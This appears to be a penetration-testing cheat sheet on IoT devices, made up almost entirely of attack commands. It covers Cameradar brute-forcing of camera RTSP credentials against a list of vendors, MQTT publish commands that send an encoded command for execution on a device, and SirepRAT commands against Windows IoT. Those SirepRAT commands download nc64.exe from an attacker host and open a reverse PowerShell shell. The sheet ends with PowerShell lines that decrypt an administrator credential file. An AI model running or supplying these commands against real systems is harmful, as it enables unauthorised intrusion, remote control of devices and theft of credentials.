https://github.com/Ullaakut/cameradar
Execution using a custom Wordlist
$ sudo docker run -t -v /PATH/TO/WORDLIST:/FOLDER/ ullaakut/cameradar -c " /FOLDER/<WORDLIST>.json" -t < RHOST>
$ sudo docker run -t -v /PATH/TO/WORDLIST:/FOLDER/ ullaakut/cameradar -c " /FOLDER/<WORDLIST>.json" -t < RHOST> -p < RPORT>
Robert Bosch GmbH
Panasonic Corporation
Honeywell International Inc.
Cisco Systems, Inc.
Sony Group Corporation
LG Electionics Inc.
Hikvision
Dahua Technology
Axis Communications AB
Teledyne Technologies Incorporated
Hanwha Group
Motorola Solutions (Avigilon)
Uniview
$ sudo apt-get install mosquitto mosquitto-clients
$ mosquitto_sub -h < RHOST> -t U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub
$ mosquitto_pub -h < RHOST> -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -m ' hello'
{ "id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d", "cmd": "CMD", "arg": "ls" }
$ mosquitto_pub -h < RHOST> -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -m ' eyAiaWQiOiAiY2RkMWIxYzAtMWM0MC00YjBmLThlMjItNjFiMzU3NTQ4YjdkIiwgImNtZCI6ICJDTUQiLCAiYXJnIjogImxzIiB9'
Python-based MQTT Client Shell
https://github.com/bapowell/python-mqtt-client-shell
$ python mqtt_client_shell.py
> host=< RHOST>
> host < RHOST>
> connect
> subscribe
> subscribe topic 0, 1, 2, 3
> exit
https://github.com/SafeBreach-Labs/SirepRAT
$ python SirepRAT.py < RHOST> LaunchCommandWithOutput --return_output --cmd " C:\Windows\System32\cmd.exe" --args " /c powershell Invoke-Webrequest -OutFile C:\\ Windows\\ System32\\ spool\\ drivers\\ color\\ nc64.exe -Uri http://<LHOST>:80/nc64.exe" --v
$ python SirepRAT.py < RHOST> LaunchCommandWithOutput --return_output --cmd " C:\Windows\System32\cmd.exe" --args " /c C:\\ Windows\\ System32\\ spool\\ drivers\\ color\\ nc64.exe <LHOST> <LPORT> -e powershell.exe" --v
$ $env :UserName // get the current username
$ $credential = Import-CliXml -Path U:\U sers\a dministrator\r oot.txt // accessing a file
$ $credential.GetNetworkCredential ().Password // show input